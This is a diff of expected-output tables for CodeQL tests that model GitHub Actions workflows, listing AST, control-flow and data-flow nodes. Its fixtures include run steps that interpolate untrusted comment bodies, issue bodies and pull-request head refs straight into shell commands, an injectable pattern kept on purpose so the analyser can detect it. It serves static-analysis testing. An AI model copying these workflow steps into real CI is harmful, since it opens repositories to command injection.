| allUsesNodes | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | 
@@ -93,12 +155,30 @@ jobUsesNodes | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesSteps -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:7:11 | run | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:8:11 | run | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:10:11 | run | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:13:11 | run | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:16:11 | run | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:20:11 | run | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | 
@@ -112,6 +192,45 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | parentNodes +| .github/workflows/expression_nodes.yml:1:1:1:2 | on | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:7:11 | run | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:8:9:8:11 | run | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:10:11 | run | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:13:11 | run | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... 
ody }}' | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:16:11 | run | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:20:11 | run | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... 
ody }}' | | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -124,6 +243,7 @@ parentNodes | .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | | .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | @@ -151,6 +271,7 @@ parentNodes | .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | | .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | 
@@ -160,17 +281,20 @@ parentNodes | .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | | .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | | .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | | .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | 
@@ -180,72 +304,154 @@ parentNodes | .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... 
alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... 
iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | exprNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| 
.github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... 
iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | nodeLocations +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | 
.github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... 
alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | | .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | @@ -349,4 +555,4 @@ calls | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index f30db9af92fe..bf52da395fef 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
